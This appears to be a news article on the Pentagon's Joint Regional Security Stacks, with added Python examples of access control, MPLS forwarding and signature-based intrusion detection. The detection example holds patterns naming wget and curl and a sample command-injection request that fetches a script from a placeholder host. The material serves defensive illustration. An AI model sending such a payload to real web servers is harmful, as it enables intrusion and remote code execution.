Statistically, breaking into the Defense Department’s digital networks isn’t that easy.
There were 30 million “known malicious cyber intrusions” between September 2014 and June 2015, but less than 0.1 percent actually penetrated the Pentagon’s cyber defenses, according to Defense Secretary Ashton Carter, in a Sept. 30 memo to senior Pentagon staff.
But though minuscule in percentage terms, the aggregate number of successful attacks looms large: 30,000 successful intrusions in just 10 months. That’s got to change, Carter said in a Sept. 28 memo to the military’s senior leaders.
Now, penetrating defense networks is about to get much harder.
Over the next three years, the military will deploy a series of sophisticated gateways to better protect its vast network from external attack, according to Army Col. Scott Jackson, who oversees construction of the Joint Information Environment, or JIE.
“We’re trying to build the Fort Knox of [network] security,” Jackson said.
Central to the JIE will be 49 Joint Regional Security Stacks, through which all digital traffic must flow between the Pentagon’s networks and the Internet. These digital checkpoints will feature multiple security layers and examine every data packet entering or leaving the military’s network. Once fully in place in late 2017 or early 2018, Jackson said, reaching the network should be a lot harder.
Devices within each security stack will automatically block most attempted intrusions, while filtering others for further analysis. Packet capture technology will examine the data bits that enter and exit the network, making copies of some for detailed analysis off line.
Segregating and Analyzing Incoming Data
Rules embedded in security stack software will prevent unauthorized persons and bots from logging in. User profiles will match up with user access rights. For example, Jackson said, “No Army person should be trying to log on as an Air Force administrator.”
Data will be segregated by user types and traffic flows. Simply gaining access to the network will not be enough, as users will also need credentials to access individual systems and data on the network. The system will work like a safe deposit vault in a bank, Jackson said. If an attacker manages to break into the bank (or network), he will still “have to start drilling locks” on the deposit boxes (or individual systems) to get anything of value. “We’re making it way harder than it is right now.”
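The two layers Jackson describes, a login rule keyed on the user's profile at the security stack and a separate authorization at each individual system, can be sketched in a few dozen lines. The code below is an added illustration written for this article, not JRSS software; the users, systems, roles, traffic-flow labels and ACLs are all constructed for the example, and the "deny by default" behaviour at the second layer is the point: a valid network login grants nothing on a system that has no entry for that role.

```python
"""Two-layer access check: profile-based login rule, then per-system ACL.
Example code, not JRSS software. All data below is constructed."""
from dataclasses import dataclass, field


@dataclass(frozen=True)
class User:
    name: str
    service: str          # owning service, e.g. "Army" (constructed)
    roles: frozenset      # roles this profile is entitled to claim
    clearance: str        # highest traffic flow the profile may reach


@dataclass
class System:
    name: str
    flow: str                                   # "unclass" or "classified"
    acl: dict = field(default_factory=dict)     # role -> set of permitted actions


# Unclassified and classified traffic are segregated; a lower-cleared
# profile must never reach a system on the higher flow.
FLOW_RANK = {"unclass": 0, "classified": 1}

# Constructed directory and system inventory.
USERS = {
    "alice": User("alice", "Army", frozenset({"user", "army_admin"}), "unclass"),
    "bob":   User("bob", "Air Force", frozenset({"user"}), "unclass"),
    "carol": User("carol", "Joint Staff", frozenset({"jcs_staff"}), "classified"),
}
SYSTEMS = {
    "army-mail": System("army-mail", "unclass",
                        {"user": {"read"}, "army_admin": {"read", "write", "admin"}}),
    "af-dns":    System("af-dns", "unclass", {"af_admin": {"admin"}}),
    "jcs-mail":  System("jcs-mail", "classified", {"jcs_staff": {"read", "write"}}),
}


def network_login(user: User, claimed_role: str) -> bool:
    """Layer 1, at the security stack: a profile may only claim a role it holds.
    An Army user claiming an Air Force administrator role is refused here,
    before any system behind the stack is touched."""
    return claimed_role in user.roles


def system_authorize(user: User, role: str, system: System, action: str) -> bool:
    """Layer 2, at the individual system ("drilling the deposit box"):
    deny by default, and refuse to cross into a higher traffic flow."""
    if FLOW_RANK[system.flow] > FLOW_RANK[user.clearance]:
        return False
    return action in system.acl.get(role, set())


def request(username: str, role: str, system_name: str, action: str) -> tuple:
    """Run one request through both layers. Returns (allowed, stage)."""
    user = USERS.get(username)
    system = SYSTEMS.get(system_name)
    if user is None or system is None:
        return False, "unknown principal or system"
    if not network_login(user, role):
        return False, "denied at network login"
    if not system_authorize(user, role, system, action):
        return False, "denied at system"
    return True, "allowed"


if __name__ == "__main__":
    for req in [("alice", "army_admin", "army-mail", "admin"),
                ("alice", "af_admin", "af-dns", "admin"),
                ("bob", "user", "army-mail", "write"),
                ("alice", "army_admin", "jcs-mail", "read")]:
        print(req, "->", request(*req))
```

Note that the second check is evaluated by the system, not the stack: even if an attacker has a working network login (as in the phishing case discussed later in this article), every system still applies its own ACL and its own flow boundary.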
Plans call for 24 Joint Regional Security Stacks to process unclassified network traffic and 25 more to process classified traffic, said Army Chief Information Officer (CIO) Lt. Gen. Robert Ferrell.
Limiting the network’s on-ramps and off-ramps focuses the location of potential attacks. Those 49 security stacks reduce “our network’s surface attack area – the part of the network vulnerable to cyber intrusion – from over 1,000 access points to less than 50, dramatically improving network security,” Ferrell told the House Armed Services Subcommittee on Intelligence, Emerging Threats and Capabilities in February.
In essence, the JIE will be a single joint network with one shared infrastructure, one set of standards and one security architecture, connecting everyone on the DoD network, Ferrell said, adding without it, “we have too many disparate networks, too many vulnerabilities and too many barriers that prevent collaboration with partners.”
The first Joint Regional Security Stack is in operation today at Joint Base San Antonio, with three more stacks scheduled to become operational this month. “Then over the next six months, that number should begin to grow rapidly,” Jackson said.
Of the 24 stacks for unclassified traffic, 11 will be in the U.S., with the rest overseas. All should be installed by early 2018 and tested and certified by 2019, Jackson said.
The Joint Regional Security Stacks, developed by the Army, are intended to replace individual solutions developed by each service.
For the Army, that means replacing the “top-level architecture stacks” used at Army installations, said Army Brig. Gen. Randy Taylor, director of architecture, operations, networks and space in the Army CIO.
JRSS is “a standardized network structure,” explained Air Force CIO Frank Konieczny, speaking at the DefenseOne Summit Nov. 2. Each service will “migrate a different way,” he said, acknowledging that the process will be “messy” at times, because it touches so many existing programs.
“We all have to move everything,” he said, referring to the four military services. He added for the Air Force, “we already have gateways, which support some of those functions of the JRSS and we will be transferring our gateways to [those] capabilities.”
The Marine Corps is more reticent. According to C4ISRNet.com, Marine Corps CIO Brig. Gen. Dennis Crall expressed concerns about the underlying concept of operations for JIE at an Armed Forces Communications and Electronics Association (AFCEA) event Nov. 13, saying until the concept of operations and software are mature, Marine participation is no more than “a definite maybe.”
The 18-inch-wide racked security stacks each hold security tools including firewalls, intrusion detection and prevention systems and packet capture equipment to handle incoming and outgoing network traffic.
The security stacks also house multiprotocol label switching equipment, technology that speeds up the flow of network traffic by using path labels instead of network addresses to determine the route data packets will take from their origin to their destination. Path labels speed traffic by eliminating the need for each router along the delivery route to look up the destination network address before sending each packet on to the next router.
MPLS also better manages the mix of high priority and low priority traffic, enabling each circuit to carry more traffic.
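The difference between hop-by-hop IP forwarding and label switching is easiest to see by counting lookups. The simulation below is an added example for this article, not code from any JRSS component; the four-router path, the prefixes, the labels and the label-switching tables are all constructed. The ingress router classifies a packet once with a longest-prefix match and pushes a label; each core router then forwards on an exact label lookup and swaps or pops the label without consulting its IP table; the egress router does one final IP lookup to deliver the packet. A destination with no label-switched path set up falls back to ordinary IP forwarding, so the two paths can be compared on the same topology.

```python
"""Label switching versus per-hop IP lookup. Example code with a constructed
topology R1 (ingress) -> R2 -> R3 -> R4 (egress); not JRSS or vendor code."""
import ipaddress

# Per-router IP forwarding tables: prefix -> next hop. Plain IP forwarding
# needs a longest-prefix match against a table like this at every hop.
FIB = {
    "R1": {"10.0.0.0/8": "R2", "10.20.0.0/16": "R2"},
    "R2": {"10.0.0.0/8": "R3", "10.20.0.0/16": "R3"},
    "R3": {"10.0.0.0/8": "R4", "10.20.0.0/16": "R4"},
    "R4": {"10.0.0.0/8": "R5-other", "10.20.0.0/16": "host"},
}

# MPLS state (constructed). The ingress maps a prefix (the forwarding
# equivalence class) to a label and next hop; core routers hold only
# label -> (outgoing label, next hop). None means "pop" (penultimate hop).
FEC = {"10.20.0.0/16": (100, "R2")}
LFIB = {"R2": {100: (200, "R3")}, "R3": {200: (None, "R4")}}


def lpm(table, dst):
    """Longest-prefix match: the per-hop cost that label switching removes."""
    ip = ipaddress.ip_address(dst)
    best = None
    for prefix, value in table.items():
        net = ipaddress.ip_network(prefix)
        if ip in net and (best is None or net.prefixlen > best[0]):
            best = (net.prefixlen, value)
    return None if best is None else best[1]


def forward_ip(dst):
    """Hop-by-hop IP forwarding. Returns (path, lpm_count, label_lookups, target)."""
    node, path, lpm_count = "R1", ["R1"], 0
    while node in FIB:
        nh = lpm(FIB[node], dst)
        lpm_count += 1
        if nh is None:
            return path, lpm_count, 0, "dropped"
        path.append(nh)
        node = nh
    return path, lpm_count, 0, node


def forward_mpls(dst):
    """Label-switched forwarding. Same return shape as forward_ip()."""
    fec = lpm(FEC, dst)          # the one and only classification, at ingress
    if fec is None:
        return forward_ip(dst)   # no LSP for this destination: plain IP path
    label, node = fec
    path, lpm_count, label_lookups = ["R1", node], 1, 0
    while label is not None:     # core: exact-match label lookup, swap or pop
        entry = LFIB.get(node, {}).get(label)
        label_lookups += 1
        if entry is None:
            return path, lpm_count, label_lookups, "dropped"
        label, node = entry
        path.append(node)
    target = lpm(FIB[node], dst)  # egress delivers with one local IP lookup
    lpm_count += 1
    path.append(target)
    return path, lpm_count, label_lookups, target


if __name__ == "__main__":
    for dst in ("10.20.5.6", "10.1.2.3"):
        print(dst, "ip:  ", forward_ip(dst))
        print(dst, "mpls:", forward_mpls(dst))
```

On this path, 10.20.5.6 costs four prefix lookups under plain IP forwarding and two under MPLS (ingress classification and egress delivery), with the two core routers doing only label lookups. The label also carries the traffic-class marking that lets the core give high-priority traffic precedence over low-priority traffic on the same circuit, the second point in the paragraph above, though the simulation does not model queueing.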
JRSS will establish a common set of defenses for the military network. Today there are hundreds of bases, each with its own network security setup, Jackson said. Some are strong, others not so. When security is regionalized, all access points to military networks will be protected to the same level. No one’s security will decrease, he said, but in many locations, it will increase.
Moving to regional security stacks also increases network situational awareness. Security managers will be able to see all traffic coming and going on DoD networks. If suspicious activity is spotted in one location, operators will be able to see whether it is also happening elsewhere.
Right now each service, and in many cases each base, post, camp or station, may see abnormal behavior, Jackson said. “But determining if it is malicious behavior” rather than malfunctioning equipment “is difficult when hundreds of different cyber defenders are looking at their little piece of cyberspace,” Jackson said. “JRSS provides the global visibility to quickly determine if an event is malicious or not.”
Consolidating network security into 49 regional centers also means the military’s best cyber defenders can be concentrated in fewer locations.
Much of what JRSS will do will be automated. For example, intrusion prevention systems will compare network traffic to a database of known attack “signatures” – like digital “most-wanted photos,” Jackson said. When the intrusion prevention software sees a known malicious signature, it will automatically block the attack.
But human intervention will be required for other attacks.
Intrusion detection software can spot suspicious activity and sound an alarm, but just as a burglar alarm won’t stop a brick from being thrown through a window, Jackson said, stopping such an intrusion requires security personnel to take defensive action.
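The three behaviours described in the last several paragraphs, automatic blocking on a known signature, raising an alert (with a packet capture) for a human when a match is only suspicious, and comparing events across stacks to tell a campaign from a single misbehaving device, fit together in one small pipeline. The code below is an added example written for this article, not JRSS or vendor software; the signature database, the stack names, the source addresses and the packet payloads are all constructed, and the correlation rule (same signature from the same source at two or more stacks) is one reasonable rule, not the rule JRSS operators use.

```python
"""Signature matching at each stack, then cross-stack correlation.
Example code; signatures, stack names and traffic are constructed."""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Signature:
    name: str
    pattern: bytes   # regular expression over the payload
    action: str      # "block": dropped automatically; "alert": handed to a human


# Constructed signature "database". First match wins, so the two clearly
# malicious patterns precede the ambiguous one, which only alerts because a
# legacy user agent can come from old but legitimate software.
SIGNATURES = [
    Signature("shellcode-nop-sled", rb"\x90{16,}", "block"),
    Signature("web-cmd-injection-fetch", rb"cmd=[^\s&]*?(;|\|)\s*(wget|curl)\s", "block"),
    Signature("legacy-ie6-ua-beacon",
              rb"User-Agent: Mozilla/4\.0 \(compatible; MSIE 6\.0", "alert"),
]

# Constructed traffic as (stack, source address, payload).
SAMPLE = [
    ("JRSS-01", "203.0.113.7", b"GET /index.php?cmd=id;wget http://203.0.113.7/x.sh HTTP/1.1"),
    ("JRSS-05", "203.0.113.7", b"GET /index.php?cmd=id;wget http://203.0.113.7/x.sh HTTP/1.1"),
    ("JRSS-01", "198.51.100.9", b"\x90" * 32 + b"\xcc"),
    ("JRSS-01", "192.0.2.44", b"POST /update.php HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)"),
    ("JRSS-09", "192.0.2.44", b"POST /update.php HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)"),
    ("JRSS-12", "10.5.5.5", b"POST /update.php HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)"),
    ("JRSS-03", "192.0.2.10", b"GET /healthz HTTP/1.1"),
]


def inspect(payload: bytes):
    """Signature check at one stack. Returns (action, signature name or None)."""
    for sig in SIGNATURES:
        if re.search(sig.pattern, payload):
            return sig.action, sig.name
    return "pass", None


def run_stacks(records):
    """Pass every record through its stack. Blocks are automatic; alerts carry
    a truncated capture for offline analysis; both are logged for correlation."""
    verdicts, events = [], []
    for stack, src, payload in records:
        action, sig = inspect(payload)
        verdicts.append((stack, src, action, sig))
        if action != "pass":
            events.append({"stack": stack, "src": src, "sig": sig,
                           "action": action, "capture": payload[:48]})
    return verdicts, events


def correlate(events):
    """The global view: the same signature from the same source at two or more
    stacks is tagged coordinated; a single-stack hit is isolated and may be a
    misbehaving device rather than an attack. Returns {(sig, src): (tag, stacks)}."""
    stacks_by_key = defaultdict(set)
    for e in events:
        stacks_by_key[(e["sig"], e["src"])].add(e["stack"])
    return {k: ("coordinated" if len(v) > 1 else "isolated", sorted(v))
            for k, v in stacks_by_key.items()}


def summarize(records):
    """Counts per verdict plus the correlation table."""
    verdicts, events = run_stacks(records)
    counts = {a: sum(1 for v in verdicts if v[2] == a) for a in ("pass", "block", "alert")}
    return counts, correlate(events)


if __name__ == "__main__":
    counts, corr = summarize(SAMPLE)
    print(counts)
    for key, value in corr.items():
        print(key, "->", value)
```

In the constructed batch the command-injection probe from 203.0.113.7 is blocked at both stacks it reaches and shows up as coordinated in the global view, the lone NOP sled is blocked and stays isolated, and the legacy user-agent alert splits into a two-stack external source worth an analyst's time and a single internal address that looks more like an old client than an attack. A defender watching only one stack would see the same alert in all three cases.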
Although JRSS is expected to substantially improve Defense Department network security, there remain some security problems JRSS can’t solve.
Jackson said the event that brought down an email system used by the Joint Chiefs of Staff last summer was a “sophisticated” attack apparently launched from Russia, and “the result of a phishing attack.” Someone opened a phony email that introduced malware into the system.
“Each of us, as network users and providers, has an individual responsibility to protect the Department of Defense information network.”
William Matthews is a veteran defense and technology journalist. He has written for Defense News, Army Times, Navy Times, Federal Computer Week, Army Magazine and numerous other publications.